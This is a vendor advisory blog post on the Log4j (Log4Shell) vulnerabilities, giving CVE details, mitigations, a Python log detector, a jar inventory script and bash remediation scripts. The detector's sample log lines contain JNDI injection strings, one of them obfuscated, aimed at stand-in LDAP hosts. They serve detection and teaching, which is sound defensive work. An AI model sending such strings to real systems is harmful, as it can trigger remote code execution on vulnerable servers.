UPDATED: Log4j Critical Vulnerability Scores a 10/10 For How Bad It Is (So Act Fast)

 

Note: Automox does not use Log4j. There is no known impact to Automox’s products or services as a result of this vulnerability.

We've compiled a timeline of the latest Log4j news for easy reference here.


Update (12/18/2021): Yet another Log4j vulnerability was discovered, this time in version 2.16.0, the release that patched CVE-2021-44228 and CVE-2021-45046. The new vulnerability (CVE-2021-45105) allows infinite recursion in lookup evaluation, which a threat actor could use to cause a denial of service.

The National Institute of Standards and Technology (NIST) has yet to score the vulnerability, though Apache scores it as a 7.5, so it is severe. Apache released version 2.17.0 to patch the newest vulnerability. We recommend patching immediately; if you are unable to, our Worklet below will still temporarily remediate all three of the Log4j vulnerabilities discussed (CVE-2021-44228, CVE-2021-45046, and CVE-2021-45105) until you are able to patch the vulnerable systems.


UPDATE (12/17/21): On December 6, version 2.15.0 was released to address CVE-2021-44228, the now infamous 10/10 CVSS remote code execution (RCE) vulnerability in Log4j known as Log4Shell. Shortly after, CVE-2021-45046 was discovered in version 2.15.0, with a CVSS of 3.7. Version 2.16.0 was released on December 13 to address the new vulnerability.


However, on December 17 a researcher discovered a new bypass that allows full RCE once again, which resulted in a CVSS increase from 3.7 to 9.0. If you only upgraded to version 2.15.0, you are not protected from possible RCE; upgrade to 2.16.0 immediately. Visit the Apache website for additional information.


Log4Shell is a zero-day unauthenticated Remote Code Execution (RCE) vulnerability in Log4j versions 2.0-beta9 up to 2.14.1 identified as CVE-2021-44228. Log4Shell scores a perfect 10.0 on CVSS, the maximum possible criticality for a vulnerability. The vulnerability was demonstrated with a proof of concept exploit published to GitHub, and threat actors are already searching for the vulnerability.

Apache stated that in Log4j versions 2.14.1 and earlier, "JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI-related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled."

Exploitation allows full control of a system running a vulnerable Log4j. Apache has quickly released Log4j 2.16.0 to address the vulnerability; in 2.16.0, message lookup substitution is disabled by default. The flaw can also be mitigated by reverting to earlier versions of Log4j (see the non-patch remediation instructions below).

Log4j: Action required

YARA rules are available to detect exploitation attempts: https://gist.github.com/Neo23x0/e4c8b03ff8cdf1fa63b7d15db6e3860b

These rules allow organizations to quickly identify exploitation attempts targeting CVE-2021-44228. Early indicators show adversaries already mass-scanning to identify vulnerable targets.
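As an added example (not the YARA rules linked above, which cover many more variants), the following Python detector applies the same idea to plain text logs: it resolves the simplest nested lookups so that the string a vulnerable Log4j would actually evaluate can be matched, then flags any line that resolves to a JNDI lookup. The log lines are constructed for the example and the function names are assumptions.

```python
"""Flag log lines that contain a Log4j JNDI lookup string.

Added example, not code from Automox or from the linked YARA gist.
The sample lines below are constructed, not captured traffic.
"""
import re

# Innermost ${lower:x} / ${upper:x} lookups. Resolving them before matching
# means "${${lower:j}ndi:...}" is seen as "${jndi:...}", which is what a
# vulnerable Log4j would evaluate. Applied repeatedly until stable.
CASE_LOOKUP = re.compile(r"\$\{(lower|upper):([^${}]*)\}")

# The lookup prefix that triggers JNDI resolution in vulnerable versions.
JNDI_LOOKUP = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def normalize(text):
    """Evaluate lower/upper lookups from the inside out until none remain."""
    previous = None
    while previous != text:
        previous = text
        text = CASE_LOOKUP.sub(
            lambda m: m.group(2).lower() if m.group(1) == "lower" else m.group(2).upper(),
            text,
        )
    return text


def is_jndi_lookup(line):
    """True if the line, after normalization, contains a ${jndi: lookup."""
    return JNDI_LOOKUP.search(normalize(line)) is not None


def flag_lines(lines):
    """Return (1-based line number, line) for every line that matches."""
    return [(number, line) for number, line in enumerate(lines, 1) if is_jndi_lookup(line)]


# Constructed web-server access log lines (documentation-range addresses).
SAMPLE_LOGS = [
    '203.0.113.5 - - [10/Dec/2021:10:12:01 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [10/Dec/2021:10:12:07 +0000] "GET / HTTP/1.1" 200 512 "-" '
    '"${jndi:ldap://198.51.100.7:1389/a}"',
    '203.0.113.9 - - [10/Dec/2021:10:12:09 +0000] "GET /?q=${${lower:j}ndi:ldap://198.51.100.7/a} HTTP/1.1" '
    '400 0 "-" "curl/7.79"',
    '203.0.113.12 - - [10/Dec/2021:10:12:15 +0000] "GET /search?q=${date:yyyy} HTTP/1.1" 200 88 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for number, line in flag_lines(SAMPLE_LOGS):
        print(f"line {number}: JNDI lookup string: {line}")
```

The fourth sample line contains a lookup that is not JNDI and is deliberately left unflagged, so the detector reports lookup strings that matter rather than every `${` in a log. Run the matcher over a tail of the web, application and WAF logs that feed Log4j-based services; a hit is an attempt, not proof of compromise, and should be followed up with the YARA rules and a check of outbound LDAP/RMI connections from the host.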

This zero-day can be mitigated in previous releases (2.10 and later) by setting the system property "log4j2.formatMsgNoLookups" to "true", or by removing the JndiLookup class from the classpath on impacted systems.
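Before applying either mitigation you need to know which jars are present and which state they are in. The following added example (not Automox's Worklet, and not an Apache tool) walks a directory tree, identifies log4j-core jars by their Maven pom.properties entry, reads the version, and checks whether JndiLookup.class has already been removed. The classification uses the fix versions named in this article; the jar layout, the helper names and the sample jars built in a temporary directory are assumptions and constructed fixtures.

```python
"""Inventory log4j-core jars: version and JndiLookup.class presence.

Added example; not Automox's Worklet. Jar entry names follow the standard
Maven layout (assumed). Sample jars are constructed in a temp directory.
"""
import os
import re
import tempfile
import zipfile

# Entry names inside a log4j-core jar (standard Maven layout, assumed).
JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"


def parse_version(text):
    """'2.14.1' -> (2, 14, 1); '2.0-beta9' -> (2, 0, 0); unparseable -> None."""
    match = re.match(r"(\d+)\.(\d+)(?:\.(\d+))?", text)
    if not match:
        return None
    return tuple(int(part or 0) for part in match.groups())


def assess_jar(path):
    """Classify one jar against the fix versions named in the advisory."""
    with zipfile.ZipFile(path) as jar:
        names = set(jar.namelist())
        if POM_PROPS not in names:
            return {"path": path, "log4j_core": False}
        props = {}
        for line in jar.read(POM_PROPS).decode("utf-8", "replace").splitlines():
            if "=" in line and not line.startswith("#"):
                key, value = line.split("=", 1)
                props[key.strip()] = value.strip()
        jndi_present = JNDI_CLASS in names
    version = parse_version(props.get("version", ""))
    if version is None:
        status = "unknown version: inspect manually"
    elif version >= (2, 17, 0):
        status = "patched"
    elif version >= (2, 16, 0):
        status = "vulnerable: CVE-2021-45105 (upgrade to 2.17.0)"
    elif version >= (2, 15, 0):
        status = "vulnerable: CVE-2021-45046 (upgrade to 2.17.0)"
    elif jndi_present:
        interim = "remove JndiLookup.class"
        if version >= (2, 10, 0):  # the property is honoured from 2.10 onwards
            interim += " or set log4j2.formatMsgNoLookups=true"
        status = f"vulnerable: CVE-2021-44228 (upgrade to 2.17.0; interim: {interim})"
    else:
        status = "mitigated: JndiLookup.class removed (still upgrade to 2.17.0)"
    return {"path": path, "log4j_core": True, "version": props.get("version"),
            "jndi_lookup_present": jndi_present, "status": status}


def scan_tree(root):
    """Assess every *.jar below root; returns a list of result dicts."""
    results = []
    for dirpath, _, files in os.walk(root):
        for name in sorted(files):
            if name.endswith(".jar"):
                results.append(assess_jar(os.path.join(dirpath, name)))
    return results


def build_sample_jar(directory, filename, version, include_jndi):
    """Constructed fixture: a minimal jar. version=None builds a non-log4j jar."""
    path = os.path.join(directory, filename)
    with zipfile.ZipFile(path, "w") as jar:
        if version is None:
            jar.writestr("META-INF/MANIFEST.MF", "Manifest-Version: 1.0\n")
        else:
            jar.writestr(POM_PROPS, "groupId=org.apache.logging.log4j\n"
                                    f"artifactId=log4j-core\nversion={version}\n")
        if include_jndi:
            jar.writestr(JNDI_CLASS, b"")  # empty stand-in for the real class
    return path


def demo_results():
    """Scan constructed fixtures; returns {jar file name: status}."""
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_jar(tmp, "log4j-core-2.14.1.jar", "2.14.1", True)
        build_sample_jar(tmp, "log4j-core-2.14.1-stripped.jar", "2.14.1", False)
        build_sample_jar(tmp, "log4j-core-2.15.0.jar", "2.15.0", True)
        build_sample_jar(tmp, "log4j-core-2.16.0.jar", "2.16.0", True)
        build_sample_jar(tmp, "log4j-core-2.17.0.jar", "2.17.0", True)
        build_sample_jar(tmp, "other-lib-1.0.jar", None, False)
        return {os.path.basename(r["path"]): r.get("status", "not log4j-core")
                for r in scan_tree(tmp)}


if __name__ == "__main__":
    for name, status in demo_results().items():
        print(f"{name}: {status}")
```

Point `scan_tree` at application directories (and remember that log4j-core is often nested inside WAR or fat-jar files, which this example does not unpack). The "mitigated" result only means the interim workaround is in place; the upgrade to 2.17.0 is still the recommendation above.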

Automox Worklet for Log4j

Automox customers can also use a Worklet as a temporary fix for CVE-2021-44228 until the impacted systems can be patched and fully remediated.

Evaluation Code:
#!/bin/bash
#================================================================
# HEADER
#================================================================
#% SYNOPSIS
#+  This worklet is a temporary fix for CVE-2021-44228, or the
#%  Log4j vulnerability in formatMsgNoLookups.
#% DESCRIPTION
#%  This worklet is a temporary fix for CVE-2021-44228, or the
#%  Log4j vulnerability in formatMsgNoLookups.
#% USAGE
#%    ./evaluation.sh
#%
#% EXAMPLES
#%  ./evaluation.sh
#%
#================================================================
#- IMPLEMENTATION
#-    version         WF-548-Log4j_temporary_fix (www.automox.com) 1.0
#-    author          Michael King
#-
#================================================================
#  HISTORY
#     12/10/2021 : Michael King : Script creation
#     ##/##/#### : ####: Validated and catalogued
#
#================================================================
# END_OF_HEADER
#================================================================
# Always exit non-zero: the device is reported as non-compliant so the
# remediation script below runs on every device in the policy.
exit 1

Remediation Code:
#!/bin/bash
#================================================================
# HEADER
#================================================================
#% SYNOPSIS
#+ This worklet is a temporary fix for CVE-2021-44228, or the
#% Log4j vulnerability in formatMsgNoLookups.
#% DESCRIPTION
#% This worklet is a temporary fix for CVE-2021-44228, or the
#% Log4j vulnerability in formatMsgNoLookups.
#% USAGE
#% ./remediation.sh
#%
#% EXAMPLES
#% ./remediation.sh
#%
#================================================================
#- IMPLEMENTATION
#- version WF-548-Log4j_temporary_fix (www.automox.com) 1.1
#- author Michael King
#-
#================================================================
# HISTORY
# 12/10/2021 : Michael King : Script creation
# 12/17/2021 : Validated and catalogued
#
#================================================================
# END_OF_HEADER
#================================================================
# Ideally, upgrading to a current version of log4j2 is the best
# fix for this vulnerability. However, if that is not currently
# an option this may work as a temporary fix. If using this
# temporary fix, please be aware of SDLC pipeline and how changes
# here may be overwritten by your existing workflow.
#################################################################
# WARNING: Setting the option below will attempt to remove
# JndiLookup.class from the log4j-core-*.jar file, which may
# break code in production.  Make sure to thoroughly evaluate
# and test this fix before attempting it.
# After the change is made a full restart of the environment is
# recommended to ensure the change is live.
# Set log4jpath to the directory that contains log4j-core-*.jar.
# Example: in our test environment this path was
# /usr/local/apache-log4j-2.15.0-bin
# log4jpath=/usr/local/apache-log4j-2.15.0-bin
if [ -n "$log4jpath" ]; then
    # Handle each jar on its own: zip -d treats every argument after the
    # first as an entry name to delete, so an expanded glob naming several
    # jars would silently do the wrong thing.
    for jar in "$log4jpath"/log4j-core-*.jar; do
        [ -e "$jar" ] || continue  # glob matched nothing
        if zip -q -d "$jar" org/apache/logging/log4j/core/lookup/JndiLookup.class &> /dev/null; then
            echo "Successfully removed JndiLookup.class from $jar."
        else
            echo "Failed to remove JndiLookup.class from $jar." >&2
        fi
    done
else
    echo "log4jpath is not set; nothing to do." >&2
fi

This Worklet follows the recommendations from RedHat for remediation. Additional details can be found here.

Log4j remediation recommendation

Log4Shell is a CVSS 10.0 vulnerability. Organizations using the Log4j library are advised to upgrade to the latest release immediately, since attackers are already searching for exploitable targets.


Automox for Easy IT Operations

Automox is the cloud-native IT operations platform for modern organizations. It makes it easy to keep every endpoint automatically configured, patched, and secured – anywhere in the world. With the push of a button, IT admins can fix critical vulnerabilities faster, slash cost and complexity, and win back hours in their day. 

Grab your free trial of Automox and join thousands of companies transforming IT operations into a strategic business driver.
